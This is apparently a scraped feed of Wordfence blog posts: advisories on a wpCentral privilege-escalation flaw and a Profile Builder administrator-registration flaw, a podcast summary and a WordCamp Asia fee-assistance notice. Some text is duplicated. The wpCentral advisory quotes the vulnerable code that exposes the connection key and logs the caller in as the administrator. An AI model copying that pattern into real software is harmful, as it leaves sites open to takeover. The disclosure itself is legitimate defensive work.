function wpc_modal_dialog(){
    
	$mdialog = '
	<div id="wpc_connection_key_dialog" style="display: none;">
		<p>Follow the steps here to connect your website to wpcentral dashboard:</p>
		<ol>
			<li>Copy the connection key below</li>
			<li>Log into your <a href="https://panel.wpcentral.co/" target="_blank">wpcentral</a> account</li>
			<li>Click on Add website to add your website to wpcentral.</li>
			<li>Enter this website\'s URL and paste the Connection key given below.</li>
			<li>You can also follow our guide for the same <a href="https://wpcentral.co/docs/getting-started/adding-website-in-wpcentral/" target="_blank">here</a>.</li>
		</ol>
		
		<p style="font-weight:bold;">Note: Contact wpCentral Team at support@wpcentral.co for any issues</p>

		<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">'.wpc_get_connection_key().'</div>
	</div>';

This meant that an attacker with minimal, subscriber-level permissions would have the ability to add a vulnerable site to their wpCentral dashboard and take remote control over the site. They could do things like create a backup and then steal the information out of the wp-config.php file to obtain access to the database or gain access to sensitive information.

Auto-login Capabilities Unprotected

The worst thing an attacker could do if they were able to gain access to the auth_key was to auto sign-on, a feature common amongst WordPress management dashboards.

 add_action('wp_ajax_nopriv_my_wpc_signon', 'my_wpc_signon');

This functionality was intended to be used as part of the wpCentral dashboard where a user simply clicks the button to authenticate, however, it simply sent a request that could be replicated by any user. The authorization simply checked if the auth_key was the same one that is stored in the options table as wpcentral_auth_key. This key is persistent, so if compromised, it would authorize any user to send requests on behalf of a site administrator.

/**
 * Check for the authorization of the request using the auth key
 *
 * @returns		bool
 * @since		1.0
 */
function wpc_authorize(){
    global $l, $error;
	
	$return = array(); 
    
    $auth_key = wpc_optREQ('auth_key');
	if(empty($auth_key)){
		$return['error'] = 'Unauthorized Access!!';
		echo json_encode($return);
		die();
	}
	
	$verify_authkey = wpc_get_option('wpcentral_auth_key');
	if($auth_key != $verify_authkey){
		$return['error'] = $l['invalid_auth_key'];
		echo json_encode($return);
		die();
	}
}

When a correctly formatted request was sent with the proper authorization key, a user would be automatically signed-on as user 1 in the database. This is the first user account created on a site and is typically one of the primary administrative users. Once signed on, an attacker would have free reign and could inject backdoors, take down the site, and much more.

/**
 * Provides access to the website's admin panel
 *
 * @returns		bool
 * @since		1.0
 */
function my_wpc_signon(){
    global $l, $error;
	
	//Authorize
	wpc_authorize();
	
	$user_info = get_userdata(1);
		
	// Automatic login //
	$username = $user_info->user_login;
	$user = get_user_by('login', $username );
	
	// Redirect URL //
	if (!is_wp_error($user)){
		wp_clear_auth_cookie();
		wp_set_current_user($user->ID);
		wp_set_auth_cookie($user->ID);

		$redirect_to = user_admin_url();
		wp_safe_redirect($redirect_to);

		exit();
	}
}

Fortunately, in the latest version of wpCentral, the developer implemented a check that ensures that requests are being sent from the wpCentral server’s IP address. This ensures that if a connection key is compromised, mass exploitation would be much harder to conduct as requests need to come from the wpCentral dashboard rather than a simple query. Additionally, the auto sign-on feature appears to have been disabled for the time being.

Proof of Concept Walkthrough

Very Important to Update Immediately

Due to the unique nature of this vulnerability, it was difficult to create a firewall rule that provided complete protection, as we did not want to block legitimate plugin functionality. Although we do have a firewall rule in place to help protect your site, it cannot provide complete protection. Note that, as part of the plugin update, your wpCentral key will be reset, inhibiting attackers from maintaining unauthorized access to your site given that the connection key may have previously been compromised. For these reasons, we highly recommend updating to the latest version as soon as possible to ensure your site is secure.

Disclosure Timeline

February 13th, 2020 – Vulnerability initially discovered and analyzed. Initial outreach to developer.
February 14th, 2020 – Developer responds and full details are sent. Firewall rule released for Wordfence Premium users.
February 14th, 2020 – Patch released.
March 15th, 2020 – Wordfence free users receive firewall rule.

Conclusion

In today’s post, we detail a privilege escalation flaw in the wpCentral plugin. This flaw has been patched in version 1.5.1, however, we recommend that users update to the latest version (1.5.2) available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 14th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 15th, 2020.

The post Vulnerability in wpCentral Plugin Leads to Privilege Escalation appeared first on Wordfence.

Read More

Vulnerability in wpCentral Plugin Leads to Privilege Escalation

Description: Improper Access Control to Privilege Escalation
Affected Plugin: wpCentral
Affected Versions: <= 1.5.0
CVE ID: CVE-2020-9043
CVSS Score: 8.8 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Patched Version: 1.5.1

On February 13th, our Threat Intelligence team discovered a vulnerability in wpCentral, a WordPress plugin installed on over 60,000 sites. The flaw allowed anybody to escalate their privileges to those of an administrator, including subscriber-level users given open registration was enabled on a WordPress site with the vulnerable plugin installed.

The flaw also allowed for remote control of the site via the wpCentral administrative dashboard. This would be considered an improper access control vulnerability that led to privilege escalation. We privately disclosed the full details to the plugin’s developer on February 13th, and they reacted promptly by releasing a patch the next day along with a few additional security enhancements.

This is a high severity security issue that could cause severe impact to your site. We highly recommend updating to the latest version, 1.5.2, immediately.

Wordfence Premium customers received a new firewall rule on February 14th to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days, on March 15th.

What is wpCentral?

wpCentral is a WordPress plugin that was designed to be used in tandem with the wpCentral management dashboard to provide a connection between WordPress sites and a management interface. Their software is designed to make site management easy, with functionalities including automated sign-on with one click from the wpCentral dashboard, the ability to create back-ups, edit posts (in the premium version), and much more.

In order to provide this connection between the site and the management dashboard, the plugin generates a random 128 character authorization key, stored as the wpcentral_auth_key, also referred to as the “connection key.” This key is used to add a site to the wpCentral dashboard, in addition to being used as the auth_key when sending requests from the wpCentral dashboard. It is an important part of the authentication and authorization process, and because of its capabilities, it requires strict protections to prevent unauthorized use.

Connection Key Always Displayed in Admin Footer

Unfortunately, we discovered that there were weak access controls in place to protect the connection key as it was displayed in the admin_footer in a modal dialog.

 add_action('admin_footer', 'wpc_modal_dialog');

The admin footer checks to see if a page being accessed is part of the administrative interface and will display whatever is requested in that area. However, it does not verify that the user has ‘administrator’ capabilities — a common misconception with the series of functions that contain the label `admin`. This meant that any user logged in, regardless of capabilities, would have access to view any content in the modal dialog that was displayed as part of the admin_footer.

The modal dialog box that was displayed as part of the admin footer exposed the connection key along with steps that could be used to connect a site to wpCentral.

function wpc_modal_dialog(){
    
	$mdialog = '
	<div id="wpc_connection_key_dialog" style="display: none;">
		<p>Follow the steps here to connect your website to wpcentral dashboard:</p>
		<ol>
			<li>Copy the connection key below</li>
			<li>Log into your <a href="https://panel.wpcentral.co/" target="_blank">wpcentral</a> account</li>
			<li>Click on Add website to add your website to wpcentral.</li>
			<li>Enter this website\'s URL and paste the Connection key given below.</li>
			<li>You can also follow our guide for the same <a href="https://wpcentral.co/docs/getting-started/adding-website-in-wpcentral/" target="_blank">here</a>.</li>
		</ol>
		
		<p style="font-weight:bold;">Note: Contact wpCentral Team at support@wpcentral.co for any issues</p>

		<div style="text-align:center; font-weight:bold;"><p style="margin-bottom: 4px;margin-top: 20px;">wpCentral Connection Key</p></div>
		<div style="padding: 10px;background-color: #fafafa;border: 1px solid black;border-radius: 10px;font-weight: bold;font-size: 14px;text-align: center;">'.wpc_get_connection_key().'</div>
	</div>';

This meant that an attacker with minimal, subscriber-level permissions would have the ability to add a vulnerable site to their wpCentral dashboard and take remote control over the site. They could do things like create a backup and then steal the information out of the wp-config.php file to obtain access to the database or gain access to sensitive information.

Auto-login Capabilities Unprotected

The worst thing an attacker could do if they were able to gain access to the auth_key was to auto sign-on, a feature common amongst WordPress management dashboards.

 add_action('wp_ajax_nopriv_my_wpc_signon', 'my_wpc_signon');

This functionality was intended to be used as part of the wpCentral dashboard where a user simply clicks the button to authenticate, however, it simply sent a request that could be replicated by any user. The authorization simply checked if the auth_key was the same one that is stored in the options table as wpcentral_auth_key. This key is persistent, so if compromised, it would authorize any user to send requests on behalf of a site administrator.

/**
 * Check for the authorization of the request using the auth key
 *
 * @returns		bool
 * @since		1.0
 */
function wpc_authorize(){
    global $l, $error;
	
	$return = array(); 
    
    $auth_key = wpc_optREQ('auth_key');
	if(empty($auth_key)){
		$return['error'] = 'Unauthorized Access!!';
		echo json_encode($return);
		die();
	}
	
	$verify_authkey = wpc_get_option('wpcentral_auth_key');
	if($auth_key != $verify_authkey){
		$return['error'] = $l['invalid_auth_key'];
		echo json_encode($return);
		die();
	}
}

When a correctly formatted request was sent with the proper authorization key, a user would be automatically signed-on as user 1 in the database. This is the first user account created on a site and is typically one of the primary administrative users. Once signed on, an attacker would have free reign and could inject backdoors, take down the site, and much more.

/**
 * Provides access to the website's admin panel
 *
 * @returns		bool
 * @since		1.0
 */
function my_wpc_signon(){
    global $l, $error;
	
	//Authorize
	wpc_authorize();
	
	$user_info = get_userdata(1);
		
	// Automatic login //
	$username = $user_info->user_login;
	$user = get_user_by('login', $username );
	
	// Redirect URL //
	if (!is_wp_error($user)){
		wp_clear_auth_cookie();
		wp_set_current_user($user->ID);
		wp_set_auth_cookie($user->ID);

		$redirect_to = user_admin_url();
		wp_safe_redirect($redirect_to);

		exit();
	}
}

Fortunately, in the latest version of wpCentral, the developer implemented a check that ensures that requests are being sent from the wpCentral server’s IP address. This ensures that if a connection key is compromised, mass exploitation would be much harder to conduct as requests need to come from the wpCentral dashboard rather than a simple query. Additionally, the auto sign-on feature appears to have been disabled for the time being.

Proof of Concept Walkthrough

Very Important to Update Immediately

Due to the unique nature of this vulnerability, it was difficult to create a firewall rule that provided complete protection, as we did not want to block legitimate plugin functionality. Although we do have a firewall rule in place to help protect your site, it cannot provide complete protection. Note that, as part of the plugin update, your wpCentral key will be reset, inhibiting attackers from maintaining unauthorized access to your site given that the connection key may have previously been compromised. For these reasons, we highly recommend updating to the latest version as soon as possible to ensure your site is secure.

Disclosure Timeline

February 13th, 2020 – Vulnerability initially discovered and analyzed. Initial outreach to developer.
February 14th, 2020 – Developer responds and full details are sent. Firewall rule released for Wordfence Premium users.
February 14th, 2020 – Patch released.
March 15th, 2020 – Wordfence free users receive firewall rule.

Conclusion

In today’s post, we detail a privilege escalation flaw in the wpCentral plugin. This flaw has been patched in version 1.5.1, however, we recommend that users update to the latest version (1.5.2) available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since February 14th, 2020. Sites running the free version of Wordfence will receive the firewall rule update on March 15th, 2020.

The post Vulnerability in wpCentral Plugin Leads to Privilege Escalation appeared first on Wordfence.

Read More

Episode 65: WordCamp Asia Cancellation Prompts Community Support

WordCamp Asia was cancelled this week due to concerns of COVID-19/coronavirus in the region. This week, Wordfence CEO Mark Maunder talks about the decision to offer the WordCamp Asia Cancellation Fee Assistance Package to attendees, volunteers, organizers, and speakers that had planned to travel to this inaugural regional WordCamp.

We also cover a number of WordPress plugin vulnerabilities disclosed this week affecting hundreds of thousands of sites, and over 500 malicious Chrome extensions removed from the Chrome Web Store affecting millions of browsers worldwide.

Here are timestamps and links in case you’d like to jump around:

2:13 Event Manager plugin vulnerability disclosed affecting over 100,000 sites
2:44 GDPR Cookie Consent plugin improper access controls affecting over 700,000 sites
3:44 Profile Builder plugin vulnerability allowed site takeover affecting 65,000 sites
4:49 Google Chrome web store removes 500 malicious extensions affecting millions of browsers.
7:14 Interview with Mark Maunder about WordCamp Asia cancellation, the COVID-19 virus concerns, and the WordCamp Asia Cancellation Fee Assistance Package from Wordfence, GoDaddy, and Yoast.

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.

Click here to download an MP3 version of this podcast. Subscribe to our RSS feed.

You can find Mark on Twitter as @mmaunder and Kathy as @kathyzant.

Have a story you’d like us to cover? Contact us at press AT wordfence [dot] com.

A transcript for Think Like a Hacker episode 65 is forthcoming.

The post Episode 65: WordCamp Asia Cancellation Prompts Community Support appeared first on Wordfence.

Read More

Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover

Description: Unauthenticated Administrator Registration
Affected Plugin: Profile Builder (Free, Pro, and Hobbyist versions affected)
Affected Versions: <= 3.1.0
CVSS Score: 10.0 (Critical)
CVSS Vector:
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Patched Version: 3.1.1

Earlier this week, a critical vulnerability was patched in the Profile Builder plugin for WordPress. This vulnerability affected the free version available on the WordPress.org repository, as well as the commercial Pro and Hobbyist variants. According to the WordPress repository more than 50,000 sites are running the free version of Profile Builder, and our estimates suggest there are roughly 15,000 installations of the Pro and Hobbyist versions, for an estimated total of 65,000 affected sites.

Profile Builder versions up to and including 3.1.0 are affected by this vulnerability. It is crucial that any site running a vulnerable version of the plugin be updated to version 3.1.1 immediately to avoid site compromise. We have deployed a firewall rule to prevent exploitation on sites running Wordfence Premium. Sites using the free version of Wordfence will receive the rule after thirty days.

In this post we’ll take a look at the vulnerability and discuss its impact. We’ll also detail some steps a site owner can take to mitigate the issue in the event that an immediate update isn’t possible.

Vulnerability Summary

Profile Builder is a plugin designed to create custom forms that allow users to register, edit their profiles, and more. It also features a custom user role editor, allowing admins to assign custom sets of privileges to their site’s users.

To implement these custom user roles in the registration process, the plugin features form handlers to assign a selected role to a new user. This user role field isn’t present by default, but can be added by an administrator to provide a list of approved roles in a drop-down menu.

An example of a Profile Builder registration form with a User Role dropdown field.

An example of a Profile Builder registration form with a User Role dropdown field.

Unfortunately, a bug in the form handler made it possible for a malicious user to submit input on form fields that didn’t exist in the actual form. Specifically, if the site’s administrator didn’t add the User Role field to the form, an attacker could still inject a user role value into their form submission.

When an administrator adds the User Role selector to a form, they have to select a list of approved roles for new users. If this list is created, only approved roles will be accepted by the form handler. However, when the User Role field isn’t present and an attacker submits a user role anyway, there is no list of approved roles and any input is accepted.

These two issues combine to allow unauthenticated attackers to register Administrator accounts on vulnerable WordPress sites. With Administrator privileges, an attacker has effectively taken over the site and can deploy malware and other backdoors freely.

These issues have been patched as of Profile Builder version 3.1.1.

Patch Details

As we mentioned in the summary above, the impact of this vulnerability is caused by the interaction of two smaller bugs.

For the first bug, the Profile Builder plugin’s form handler would process input on any of the plugin’s possible form fields, regardless of whether that field was present in the form. To patch this bug, the developers created the validation function wppb_field_exists_in_form(). This validation is now used in the handler function of each possible form field, preventing the injection of unintended values.

/**
 * Function that checks if a field type exists in a form
 * @return bool
 */
function wppb_field_exists_in_form( $field_type, $form_args ){
    if( !empty( $form_args ) && !empty( $form_args['form_fields'] ) ){
        foreach( $form_args['form_fields'] as $field ){
            if( $field['field'] === $field_type ){
                return true;
            }
        }
    }

    return false;
}

Patching this bug effectively prevents exploitation of the second one, but the developers wisely fixed it as well. In addition to confirming the custom_field_user_role field is present on the form, the field handler now explicitly denies attempts to create Administrator users.

/* handle field save */
function wppb_userdata_add_user_role( $userdata, $global_request, $form_args ){

    if( wppb_field_exists_in_form( 'Select (User Role)', $form_args ) ) {

        $roles_editor_active = false;
        $wppb_generalSettings = get_option('wppb_general_settings', 'not_found');
        if ($wppb_generalSettings != 'not_found') {
            if (!empty($wppb_generalSettings['rolesEditor']) && ($wppb_generalSettings['rolesEditor'] == 'yes')) {
                $roles_editor_active = true;
            }
        }

        if (isset($global_request['custom_field_user_role'])) {
            if ($roles_editor_active && is_array($global_request['custom_field_user_role'])) {
                $user_roles = array_map('trim', $global_request['custom_field_user_role']);
                $user_roles = array_map('sanitize_text_field', $user_roles);

                //don't allow administrator value. it should never be here but just in case make a hard check
                if (($key = array_search("administrator", $user_roles)) !== false) {
                    unset($user_roles[$key]);
                }

                $userdata['role'] = $user_roles;
            } else {
                $role = sanitize_text_field(trim($global_request['custom_field_user_role']));
                if( $role !== 'administrator' ) {//don't allow administrator value. it should never be here but just in case make a hard check
                    $userdata['role'] = $role;
                }
            }
        }
    }

    return $userdata;
}

As you can see in the if() statement on line 181, the user role assignment code will not run if wppb_field_exists_in_form() returns False. Additionally, checks on lines 197 and 204 will prevent assignment if the intended role is administrator.

Assessing Impact

Considering all of the factors of this vulnerability, we have calculated its CVSS severity score as 10.0 (Critical). View the CVSS calculation here.

This score was determined based on the following metrics:

  • Attack Vector: Network
    • The vulnerability can be exploited via HTTP(S) access to an affected site.
  • Attack Complexity: Low
    • No excessive effort is required by an attacker, just the discovery of a vulnerable form.
  • Privileges Required: None
    • The vulnerability is exploited in the user registration process, no prior authentication is necessary.
  • User Interaction: None
    • No interaction by the site’s administrator is required to exploit a vulnerable form.
  • Scope: Changed
    • The vulnerability is present in a plugin added onto a WordPress application, but successful exploitation allows access far beyond the affected plugin itself.
  • Confidentiality: High
  • Integrity: High
  • Availability: High
    • All three CIA impact scores are High in cases where a full site takeover is possible. An attacker with Administrator privileges can disrupt site behavior, harvest data, and inject malicious content at will.

Short-Term Mitigation

We strongly recommend updating Profile Builder to version 3.1.1 as soon as possible to avoid a critical security event on your site. However, we understand that some users may be restricted by update workflows and other policies that can slow down a proper response.

In the event that your site is using a vulnerable version of Profile Builder and can’t be updated immediately, it’s possible to mitigate the severity of the vulnerability by modifying your existing Profile Builder form fields. Since an attacker can only create an Administrator account if the User Role field doesn’t exist in the form, you can add this field and properly limit it to one or more authorized roles.

A screenshot of Profile Builder's interface, showing the creation of a Select (User Role) field.

A screenshot of Profile Builder’s interface, showing the creation of a Select (User Role) field.

To add this field, access the “Form Fields” page from Profile Builder’s sidebar menu. At the top of this page, a dropdown will ask you to select an option. Choose the “Select (User Role)” option under Advanced. Fill out the form that appears by giving the field a name and description, then select the role or roles that new users should be allowed to access. For most sites, selecting Subscriber and nothing else will be sufficient.

To reiterate, it’s still of critical importance that affected users update their plugins as quickly as possible even when a mitigation like this is available. This should only be relied on as a temporary measure to prevent exploitation until you can patch your site.

Timeline

  • February 10, 2020 – Profile Builder version 3.1.1 is released. “Security update” mentioned in changelog. WPVulnDB entry created by the vulnerability’s discoverer.
  • February 12, 2020 – We deployed a firewall rule to protect Wordfence Premium users from the vulnerability.
  • February 24, 2020 – Proof-of-concept (PoC) to be released, according to the WPVulnDB entry.
  • March 13, 2020 – Firewall rule to be deployed to sites running the free version of Wordfence.

Conclusion

Profile Builder versions up to and including 3.1.0 were affected by a critical vulnerability which could allow hackers to take over a site using the plugin. All variants of the plugin, including Free, Pro, and Hobbyist, contained the bugs responsible for this issue. These bugs were patched in version 3.1.1 of all variants, released on February 10th.

Wordfence Premium users are already protected by a new firewall rule, and sites still using the free version of Wordfence will receive this rule on March 13th. Even with a firewall rule in place, we still strongly recommend performing security updates to thoroughly mitigate the risk to your site.

At this time, we have seen no indication of malicious activity seeking to exploit this vulnerability. We will continue to monitor for new exploitation campaigns that may emerge over time, and will report our findings as they come. If you believe your site may have been compromised as a result of this vulnerability or any other, don’t hesitate to reach out to our Site Cleaning team.

According to the vulnerability’s entry in WPVulnDB, the discovering researcher intends to release a detailed proof-of-concept (PoC) on February 24th. While a bad actor could develop an attack script by examining the changes made in the patched version with little difficulty, the public release of a PoC commonly results in wide exploitation by hackers. It is critically important that all affected users update to version 3.1.1 as soon as possible. To help spread awareness of these concerns, please consider sharing this report with other members of the WordPress community.

 

The post Critical Vulnerability In Profile Builder Plugin Allowed Site Takeover appeared first on Wordfence.

Read More

Wordcamp Asia Cancellation Fee Assistance Package from Wordfence

A few minutes ago it was announced that Wordcamp Asia has been cancelled due to the recent COVID-19 concerns in the region. This was a very tough call, but I believe the right one. To give you some context, I’m going to include an extract from the final part of the World Health Organization Director General’s remarks today:

If we invest now in rational and evidence-based interventions, we have a realistic chance of stopping this outbreak.

Maybe you’re tired of me saying window of opportunity, but there is a window of opportunity.

You strike hard when the window of opportunity is there. That’s what we’re saying to the rest of the world. Let’s be serious in using the window of opportunity we have.

The opportunity was created because of the serious measures China is taken in Wuhan and other cities.

But I don’t think this status can stay the same for long. That’s why we have to use the window of opportunity.

If we don’t, we could have far more cases – and far higher costs – on our hands.

I don’t think anybody wants that. This is a common enemy.

Thank you.

Based on the fact that COVID-19 is transmissible prior to symptoms appearing, aggressive quarantine tactics appear to be the right choice. We have an opportunity as a global community to collaborate to stop this infection from becoming a pandemic. But it will require collaboration to defeat this common enemy.

Cancelling WC Asia 10 days before it commences is a brutally tough call. I’ve had the organizers in my thoughts for the past few days knowing, via backchannels, that they’re agonizing over this. This is the right call.

To help do our part, Wordfence is effective immediately making a fund of $10,000 available to assist with airline and hotel change fees. The Wordcamp Asia organizers have already provided a letter that may assist with refunds and fees and you can find that on the announcement page. So try this first. If you still have trouble, we will refund you up to $200 per person on a first come first served basis. Here are our guidelines:

  • To help assist with the cancellation of Wordcamp Asia, Wordfence is providing a total of $10,000 at a maximum of $200 per person to help cover airline and hotel change fees.
  • To apply, simply email us at wcasia-assistance@wordfence.com and we will reply with what information we need and how the process works.
  • This is available to all Wordcamp Asia 2020 organizers, speakers and attendees on a first come first served basis until the fund runs out.

If you’re able to recover the funds via your company or travel insurance provider, please pursue those avenues first because WCAsia has around 1600 attendees that are affected by this and we would like to help as many people as possible.

If you’d like to discuss this I’m available in real-time on Twitter @mmaunder.

Thank you.

Mark Maunder

Wordfence Founder & CEO.

 

The post Wordcamp Asia Cancellation Fee Assistance Package from Wordfence appeared first on Wordfence.

Read More
Page 1 of 1,02612345»102030...Last »